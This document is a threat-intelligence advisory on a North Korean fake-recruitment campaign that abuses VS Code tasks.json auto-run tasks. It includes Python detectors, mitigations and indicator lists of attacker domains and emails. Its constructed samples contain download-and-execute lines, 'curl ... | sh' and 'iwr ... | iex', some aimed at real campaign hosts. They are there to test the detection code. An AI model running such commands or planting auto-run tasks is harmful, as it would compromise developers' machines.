
Tracking the VS Code Tasks Infection Vector

Severity: Medium
Published: Fri Jan 23 2026 (01/23/2026, 10:13:28 UTC)
Source: AlienVault OTX General

Description

The Contagious Interview campaign, attributed to North Korea, continues to target software developers through fake recruitment schemes. A new technique in its arsenal uses Microsoft Visual Studio Code task files to execute malicious code when a project is opened. The report documents observations of this vector, presents GitHub-based discovery methods, highlights findings including a new malicious NPM package, and outlines detection opportunities. The campaign abuses VS Code's Task feature, setting the runOptions property so that a malicious shell command runs automatically when the workspace is opened. Obfuscation includes padding the command with whitespace so that the malicious part sits off-screen, and storing payloads under image or font file names.

AI-Powered Analysis

AI analysis last updated: 01/23/2026, 11:05:35 UTC

Technical Analysis

The Contagious Interview campaign is a targeted malware operation attributed to North Korea's Lazarus Group that approaches software developers with fake job offers and projects sent as part of a fake recruitment process. The vector documented here abuses a legitimate Visual Studio Code feature rather than a vulnerability: a task in a repository's .vscode/tasks.json may set runOptions.runOn to "folderOpen", which tells VS Code to run that task as soon as the workspace is opened. A developer who clones the lure project and opens it in VS Code therefore executes the attacker's shell command on their own machine with no further click. Two caveats matter for defenders. VS Code's Workspace Trust gate still applies, so the task only fires once the folder has been trusted, but a candidate who expects to work on the project will normally accept that prompt; and the task.allowAutomaticTasks setting controls whether folderOpen tasks run at all, so its value on developer machines is worth checking.

The commands are obfuscated in simple but effective ways: the command string is padded with long runs of whitespace so that the malicious tail sits beyond the editor's visible width, and payloads are stored under image or font file names so that a directory listing looks like ordinary project assets. The report's authors used GitHub code search for this tasks.json pattern as a discovery method, which surfaced further lure repositories and a previously unreported malicious NPM package, extending the same operation into the package supply chain. The mapped ATT&CK techniques are T1059.007 (Command and Scripting Interpreter: JavaScript), T1204.002 (User Execution: Malicious File), T1055 (Process Injection), T1027 (Obfuscated Files or Information), T1564.001 (Hide Artifacts: Hidden Files and Directories) and T1102.002 (Web Service: Bidirectional Communication).

Because the technique relies on documented editor behaviour there is no patch to apply and no exploit to track; the activity itself has been observed in the wild, and the indicator list below, dominated by disposable vercel.app and onrender.com hostnames with editor-themed names, shows that the infrastructure is rotated cheaply. The recruitment lure supplies the trust the technique needs, since developers expect to open and run a prospective employer's code.
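The mechanism above is easiest to see in a checker. The following Python is an added example for this page, not code from the Abstract Security report, AlienVault or OffSeq. It parses a .vscode/tasks.json (VS Code accepts comments and trailing commas, so a plain json.loads chokes on real files, and a naive comment stripper would mangle the "//" inside any URL in a command string), flattens each task's command and args including the per-OS windows/linux/osx overrides, and flags tasks that run on folderOpen, contain long whitespace runs, hand an interpreter a file with an image or font extension, or download and execute. The thresholds, regexes and the embedded tasks.json sample are constructed; the https://example.invalid URL is a placeholder, not an indicator.

```python
"""Static triage of a checked-in .vscode/tasks.json for auto-run tasks.
Added example for this page, not code from the Abstract Security write-up,
AlienVault or OffSeq. The regexes are constructed heuristics for the behaviours
the report describes (runOn: folderOpen, whitespace padding, an interpreter fed
an image- or font-named file); download-and-execute is a generic check added here."""
import json
import re
from typing import Any, Dict, List

def strip_jsonc(text: str) -> str:
    """Strict JSON from JSON-with-comments: comments and trailing commas are
    removed only outside strings, so a "//" inside a URL survives."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:        # copy the escaped character too
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):          # line comment: skip to newline
            j = text.find("\n", i)
            i = (n if j < 0 else j) - 1
        elif text.startswith("/*", i):          # block comment
            j = text.find("*/", i + 2)
            i = (n if j < 0 else j + 2) - 1
        elif c == ",":                          # drop a trailing comma before } or ]
            j = i + 1
            while j < n and text[j] in " \t\r\n":
                j += 1
            if not (j < n and text[j] in "}]"):
                out.append(c)
        else:
            out.append(c)
        i += 1
    return "".join(out)

def parse_tasks(text: str) -> Dict[str, Any]:
    return json.loads(strip_jsonc(text))

# Constructed heuristics; tune the padding threshold against your own repositories.
_PAD = re.compile(r"[ \t]{16,}")
_ASSET_RUN = re.compile(r"\b(?:node|sh|bash|zsh|python3?|ruby|perl|pwsh|powershell)\b[^;&|]*?"
                        r"\S+\.(?:png|jpe?g|gif|svg|ico|webp|ttf|otf|woff2?|eot)\b", re.I)
_FETCH = re.compile(r"\b(?:curl|wget|Invoke-WebRequest|iwr)\b", re.I)
_PIPE_RUN = re.compile(r"\|\s*(?:sh|bash|zsh|node|python3?)\b|\beval\b|\biex\b", re.I)

def _flatten(task: Dict[str, Any]) -> str:
    """Join command and args, including per-OS overrides and the {value, quoting} form."""
    parts: List[str] = []
    for scope in (task, task.get("windows"), task.get("linux"), task.get("osx")):
        if not isinstance(scope, dict):
            continue
        cmd = scope.get("command")
        cmd = cmd.get("value") if isinstance(cmd, dict) else cmd
        if isinstance(cmd, str):
            parts.append(cmd)
        for arg in scope.get("args") or []:
            parts.append(str(arg.get("value", "")) if isinstance(arg, dict) else str(arg))
    return " ".join(parts)

def triage(tasks_json_text: str) -> List[Dict[str, Any]]:
    """One finding per task that auto-runs on folder open or whose command looks hostile."""
    findings: List[Dict[str, Any]] = []
    for task in parse_tasks(tasks_json_text).get("tasks", []):
        if not isinstance(task, dict):
            continue
        cmdline, reasons = _flatten(task), []
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            reasons.append("auto_run_on_folder_open")
        if _PAD.search(cmdline):
            reasons.append("whitespace_padding")
        if _ASSET_RUN.search(cmdline):
            reasons.append("interpreter_fed_image_or_font")
        if _FETCH.search(cmdline) and _PIPE_RUN.search(cmdline):
            reasons.append("download_and_execute")
        if reasons:
            findings.append({"label": task.get("label", "<unnamed>"), "reasons": reasons,
                             "command": " ".join(cmdline.split())})
    return findings

# Constructed sample, not a file recovered from the campaign; the URL is a placeholder.
MALICIOUS = (
    '{ "version": "2.0.0", "tasks": [\n'
    '  { "label": "Install dependencies", "type": "shell", "runOptions": { "runOn": "folderOpen" },\n'
    '    "command": "npm install' + " " * 240 + '&& node ./assets/fonts/icons.woff", },\n'
    '  { "label": "Fetch config", "type": "shell", "runOptions": { "runOn": "folderOpen" },\n'
    '    "command": "curl -s https://example.invalid/config | sh" }  // placeholder URL\n'
    '] }'
)

if __name__ == "__main__":
    print(json.dumps(triage(MALICIOUS), indent=2))
```

Run it over every .vscode/tasks.json in a clone before the folder is ever opened in the editor; any folderOpen task is worth reading regardless of the other reasons, which only raise the priority. The padding threshold of 16 spaces is deliberately low so that it also catches commands pushed past a narrow terminal; raise it if your own repositories align columns with whitespace.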

Potential Impact

For European organizations, this threat poses a significant risk to software development environments: unauthorized code execution on developer workstations, data exfiltration, and onward supply chain compromise. Developers often hold elevated privileges and write access to source code repositories and build systems, so a single infected workstation can lead to intellectual property theft, backdoors inserted into shipped software, and disruption of development pipelines. Because the auto-run task looks like project configuration and the payloads look like assets, detection may be delayed, increasing dwell time and potential damage. Organizations in critical infrastructure, finance and technology are particularly exposed given the strategic value of their software assets. The recruitment angle also carries social engineering risk beyond the technical vector; the e-mail indicators listed below are recruiter-style sender addresses at blockchain and crypto-payment company domains. Overall, the campaign threatens the confidentiality, integrity and availability of software development processes and their outputs.

Mitigation Recommendations

1. Treat .vscode/tasks.json as code: review it in pull requests, and read it before opening any repository received from outside the organization, in particular recruitment "assignments". A task with "runOn": "folderOpen" in a project you did not create deserves an explanation.
2. Enforce trusted package registries and vet NPM packages before installation, scanning for install scripts and network activity; where the workflow allows, install with npm's --ignore-scripts flag so that lifecycle scripts cannot run silently.
3. Restrict automatic task execution on developer machines: set task.allowAutomaticTasks to "off" in user settings, keep Workspace Trust enabled (security.workspace.trust.enabled) and open unknown projects in Restricted Mode, and alert on tasks.json files that contain "runOn": "folderOpen".
4. Run static analysis over repositories for the obfuscation the report describes: command strings with long whitespace runs, and files whose extension says image or font but whose content is script text.
5. Educate developers that opening a folder in an editor can execute code, and that unsolicited projects from recruiters are a known lure.
6. Use endpoint detection and response (EDR) to alert on process lineage where VS Code spawns a shell or node that in turn fetches from the network or executes a file with an asset extension.
7. Regularly audit GitHub repositories and other code hosting for task files and dependencies that nobody recognizes.
8. Segment developer workstations from build and production networks to limit the blast radius of a compromise.
9. Consume threat intelligence for this campaign, with the caveat that the domains below are disposable hosting names and will rotate; the behavioural detections above are more durable than a blocklist.
10. Consider application allowlisting for developer environments to stop unauthorized interpreters and scripts from running.
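Items 6 and 9 above become concrete once process lineage is joined with the pulse's indicators. The following Python is an added example, not code from the report, AlienVault or OffSeq: it walks constructed EDR-style process-creation records, keeps only shells and node spawned by VS Code, and flags a network fetch, a pipe or eval into an interpreter, an image- or font-named file given to an interpreter, or any URL whose host is in this page's domain list. The VS Code process names and the event records are assumptions to verify against your own telemetry; only the regioncheck.xyz URL and the vscode-config.vercel.app host in the samples come from the indicators below.

```python
"""Hunt process-creation telemetry for shells or node spawned by VS Code that
fetch from the network, pipe into an interpreter, or run an image/font-named file,
and match URLs against this page's domain indicators.
Added example for this page, not code from the report, AlienVault or OffSeq.
Assumptions: records are EDR/Sysmon-style process events already normalised to the
dict shape below; VSCODE_PARENTS are the process names expected for VS Code on
Windows, Linux and macOS (verify against your own telemetry); events are constructed."""
import re
from typing import Dict, List

# A few of the domain indicators listed on this page; load the full set from the pulse.
IOC_DOMAINS = {"www.regioncheck.xyz", "www.vscodeconfig.com", "vscode-config.vercel.app",
               "vscode-bootstrapper.vercel.app", "vscode-load.onrender.com"}
VSCODE_PARENTS = {"code", "code.exe", "electron", "code helper (plugin)", "code helper (renderer)"}
INTERPRETERS = {"sh", "bash", "zsh", "dash", "cmd.exe", "powershell.exe", "pwsh", "pwsh.exe",
                "node", "node.exe"}

_URL = re.compile(r"https?://([^/\s:'\"]+)", re.I)
_FETCH = re.compile(r"\b(?:curl|wget|Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b", re.I)
_PIPE_RUN = re.compile(r"\|\s*(?:sh|bash|zsh|node|python3?)\b|\biex\b|Invoke-Expression", re.I)
_ASSET = re.compile(r"\S+\.(?:png|jpe?g|gif|svg|ico|webp|ttf|otf|woff2?|eot)\b", re.I)


def basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def evaluate(ev: Dict[str, str]) -> List[str]:
    """Reasons the event deserves triage; empty unless VS Code spawned an interpreter."""
    if basename(ev["parent_image"]) not in VSCODE_PARENTS or basename(ev["image"]) not in INTERPRETERS:
        return []
    cmd, reasons = ev["cmdline"], []
    for host in _URL.findall(cmd):
        if host.lower() in IOC_DOMAINS:
            reasons.append("ioc_domain:" + host.lower())
    if _FETCH.search(cmd):
        reasons.append("network_fetch_from_editor")
    if _PIPE_RUN.search(cmd):
        reasons.append("pipe_or_eval_to_interpreter")
    if _ASSET.search(cmd):
        reasons.append("interpreter_given_image_or_font")
    return reasons


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    hits = []
    for ev in events:
        reasons = evaluate(ev)
        if reasons:
            hits.append({"id": ev["id"], "host": ev["host"], "reasons": reasons})
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed records; only the URL in e1 and the host in e5 come from this page's IOC list
    {"id": "e1", "host": "dev-win-07", "image": PS,
     "parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "cmdline": 'powershell -NoProfile -c "iwr https://www.regioncheck.xyz/settings/windows?flag=8 | iex"'},
    {"id": "e2", "host": "dev-lin-03", "parent_image": "/usr/share/code/code", "image": "/bin/sh",
     "cmdline": "sh -c 'node ./assets/fonts/icons.woff'"},
    {"id": "e3", "host": "dev-lin-03", "parent_image": "/usr/share/code/code", "image": "/usr/bin/node",
     "cmdline": "node node_modules/.bin/vite --port 5173"},
    {"id": "e4", "host": "dev-win-07", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell -c Invoke-WebRequest https://github.com/ -OutFile page.html"},
    {"id": "e5", "host": "dev-mac-11", "image": "/bin/zsh",
     "parent_image": "/Applications/Visual Studio Code.app/Contents/Frameworks/"
                     "Code Helper (Plugin).app/Contents/MacOS/Code Helper (Plugin)",
     "cmdline": "zsh -c 'curl -s https://vscode-config.vercel.app/x | sh'"},
]

if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(hit)
```

The explorer.exe event (e4) is ignored on purpose: the rule is scoped to editor lineage so that ordinary PowerShell downloads elsewhere do not drown the signal, and the ordinary vite dev server (e3) produces no reasons. Because the page's domains are cheap vercel.app and onrender.com hostnames that will rotate, the lineage and behaviour reasons are what keep this detection useful after the indicator list goes stale.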


Technical Details

Author: AlienVault
TLP: white
References: https://www.abstract.security/blog/contagious-interview-tracking-the-vs-code-tasks-infection-vector#appendix-indicators
Adversary: Lazarus Group
Pulse Id: 697349c8d32812c0e5094e4d

Indicators of Compromise

URLs

https://www.jsonkeeper.com/b/QJZCG
https://www.regioncheck.xyz/settings/linux?flag=8'
https://www.regioncheck.xyz/settings/mac?flag=8'
https://www.regioncheck.xyz/settings/windows?flag=8

Domains

www.regioncheck.xyz
www.vscodeconfig.com
api-server-mocha.vercel.app
brantwork.vercel.app
codeviewer-fawn.vercel.app
codeviewer-three.vercel.app
coreviewer.vercel.app
editorsettings.vercel.app
isvalid-region.vercel.app
isvalid-regions.vercel.app
jerryfox-platform.vercel.app
tailwind-version-four.vercel.app
task-hrec.vercel.app
thopywork.vercel.app
vscode-bootstrapper.vercel.app
vscode-config-setting.vercel.app
vscode-config-settings.vercel.app
vscode-config.vercel.app
vscode-helper-132.vercel.app
vscode-helper171-ruby.vercel.app
vscode-helper171.vercel.app
vscode-lnc.vercel.app
vscode-load-config.vercel.app
vscode-load.onrender.com
vscode-project-setting.vercel.app
vscode-settings-bootstrap.vercel.app
vscode-settings-config.vercel.app
vscode-toolkit-bootstrap.vercel.app
vscodesettingstask.vercel.app

Email addresses

aman.jaiswal@web3paymentsolutions.io
andrew@koinos.us
andrew_watson@koinos.us
bulat@parity.io
kblucky0219@proton.me
leandro@kasta.io
philip@cryptoasis.com

Threat ID: 697352904623b1157c3211dc

Added to database: 1/23/2026, 10:50:56 AM

Last enriched: 1/23/2026, 11:05:35 AM

Last updated: 1/24/2026, 5:21:40 AM

